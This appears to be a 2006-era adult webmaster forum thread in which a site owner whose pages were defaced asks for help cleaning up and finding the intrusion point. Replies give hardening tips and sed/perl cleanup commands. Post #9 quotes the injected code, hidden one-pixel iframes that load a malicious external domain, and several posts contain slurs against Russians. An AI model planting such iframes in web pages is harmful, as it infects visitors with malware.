![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Registered User
Join Date: Sep 2005
Posts: 91
|
![]() again, for third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i i cannot even imagine what i would do. i am so pissed now!
any how, my hosting provider is lookin on how they got in, any ideas on where i should check? also is there a way to run a shell command to replace a string in all .html files accross a directory structure? i hate to spend next 20 hours going over all my files. any help is appreciated. ![]()
__________________
2B || !2B |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 |
Registered User
Join Date: Sep 2005
Posts: 91
|
i am loosing traffic by thousands each fucking minute, damn!
__________________
2B || !2B |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
sperm tail
Industry Role:
Join Date: May 2004
Location: nj
Posts: 11,019
|
show the code being added and maybe we can help you a little more
__________________
Got Cam Models? icq: 361-607-616 ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
North Coast Pimp
Join Date: Dec 2005
Location: 304-534-757
Posts: 9,395
|
First step is not calling them "fucking" anything.....
It is best to be nice to the Russians, Treat them the same as you would like to be treated.... |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 |
Confirmed User
Industry Role:
Join Date: May 2006
Posts: 7,436
|
Trie to defend whit Kaspersky
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 |
Confirmed User
Join Date: Jun 2006
Posts: 146
|
those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck
__________________
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 |
Confirmed User
Industry Role:
Join Date: Mar 2001
Location: Miami Beach, FL
Posts: 1,053
|
if your with a good managed hosting provider, things like this would not happen.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 |
Confirmed User
Join Date: Jul 2003
Posts: 806
|
What is your host?
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 |
Registered User
Join Date: Sep 2005
Posts: 91
|
i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again.
I dont hate every Russian, but why is like 99.9% of todays worlds hackers are Russians, they fucking suck and should die! any how the code they included is as follows: WARNING: access the page on your own rist it loads some applets and shit: Code:
<iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe>
__________________
2B || !2B |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 |
Registered User
Join Date: Sep 2005
Posts: 91
|
Domain Name: DGFJHEWFNDSBFSDVF.BIZ
Domain ID: D15515786-BIZ Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Sponsoring Registrar IANA ID: 82 Domain Status: clientTransferProhibited Registrant ID: OLNIC34919537 Registrant Name: Boriskin Gleb Registrant Organization: Boriskin Gleb Registrant Address1: vesekaya 4-155 Registrant City: Novosibirsk Registrant State/Province: Novosibirsk Registrant Postal Code: 109880 Registrant Country: Russian Federation Registrant Country Code: RU Registrant Phone Number: +7.3098098911 Registrant Facsimile Number: +7.3098098911 Name Server: NS3.ASDBIZ.BIZ Name Server: NS4.ASDBIZ.BIZ Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006 Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007 Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006 FUCKING RUSSIAN!
__________________
2B || !2B |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 |
Confirmed User
Join Date: Nov 2005
Location: Metro Detroit
Posts: 748
|
ok, if all the files are in the same directory you can just run this...
cat * | sed 's/$FIND/$REPLACE/g' change $FIND to what you want to match and $REPLACE with what you want to change it to. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#12 |
Too lazy to set a custom title
Industry Role:
Join Date: Sep 2003
Posts: 22,651
|
:::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 | |
Confirmed User
Join Date: Jun 2006
Posts: 146
|
Quote:
not just that. you have to make each file 'read only' which is an even bigger pain in the ass
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 |
Too lazy to set a custom title
Industry Role:
Join Date: Sep 2003
Posts: 22,651
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 |
Registered User
Join Date: Sep 2005
Posts: 91
|
no shit, you guys never found how they got in? amazing....
__________________
2B || !2B |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 |
Confirmed User
Join Date: Sep 2006
Location: internets
Posts: 6,954
|
russians are crazy i kno first hand
__________________
Teen Porn Models / Solo Girls |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 |
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff.
Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
Ask me about negative cash flow
Join Date: May 2006
Posts: 539
|
russian hackers lol
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 |
Confirmed User
Join Date: Nov 2006
Location: Tätervolk City
Posts: 696
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#21 | |
Confirmed User
Join Date: Oct 2005
Location: Charlotte, NC
Posts: 908
|
Quote:
perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"` It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.
__________________
ICQ: 284903372 |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#22 |
No Refunds Issued.
Industry Role:
Join Date: Feb 2001
Location: GFY
Posts: 28,300
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#23 |
Confirmed User
Join Date: Feb 2006
Location: So.Cal
Posts: 381
|
six figure sys admins are worth thier weight in gold
__________________
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#25 |
ICQ: 304-611-162
Join Date: Feb 2005
Location: Masterdam
Posts: 13,245
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#26 | |
Confirmed User
Industry Role:
Join Date: Jan 2004
Location: Toronto
Posts: 2,332
|
Quote:
Yeah ... Now stfu and pay me for this month ![]() ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#27 |
Confirmed User
Join Date: Mar 2001
Location: Baltimore
Posts: 2,082
|
I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#28 |
So Fucking Banned
Join Date: Aug 2003
Location: ICQ #23642053
Posts: 19,593
|
You guys should look into curing SQL injection.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#29 | |
Confirmed User
Join Date: Nov 2005
Location: Metro Detroit
Posts: 748
|
Quote:
I like your solution better than mine though.. I need to get more comfortable with perl. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#30 |
Registered User
Join Date: Sep 2005
Posts: 91
|
![]() got hit again. i am loosing it...........
__________________
2B || !2B |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#31 |
Confirmed User
Industry Role:
Join Date: May 2004
Location: New Jersey
Posts: 1,532
|
x3movies,
Contact me on ICQ, I can more likely than not help. 251095197 -JM
__________________
Free Adult Blog Hosting http://www.waqn.com ![]() free porn www.mojohost.com - Best guys, best host. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#32 |
Confirmed User
Industry Role:
Join Date: May 2004
Location: New Jersey
Posts: 1,532
|
EDIT: free of charge
__________________
Free Adult Blog Hosting http://www.waqn.com ![]() free porn www.mojohost.com - Best guys, best host. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#33 |
Confirmed IT Professional
Industry Role:
Join Date: Nov 2005
Location: Hollywood, CA
Posts: 3,744
|
Ever heard of back-ups?
__________________
The Best Affiliate Software, Ever. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#34 |
Confirmed User
Join Date: Nov 2003
Location: QC
Posts: 296
|
i got hacked too... an Iframe installing a Trojan horse
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#35 |
Confirmed User
Join Date: Feb 2002
Location: ICQ: 251425 Fr/Au/Ca
Posts: 6,863
|
Get yourself a copy of CentOS and Atomic Secured Linux
[http://atomicorp.com/amember/signup.php] And kiss all these problems goodbye. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#36 |
Confirmed User
Join Date: Aug 2006
Location: ICQ: 55274943
Posts: 737
|
when is the last time you evaluated a sysadmins weight? most of the ones i know are morbidly obese just as the cliche offers.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#37 |
Confirmed User
Industry Role:
Join Date: Jan 2004
Location: UK
Posts: 877
|
i had this a while back host said it was something to do with awstats..
__________________
Get Nasty - Make Bank Here |
![]() |
![]() ![]() ![]() ![]() ![]() |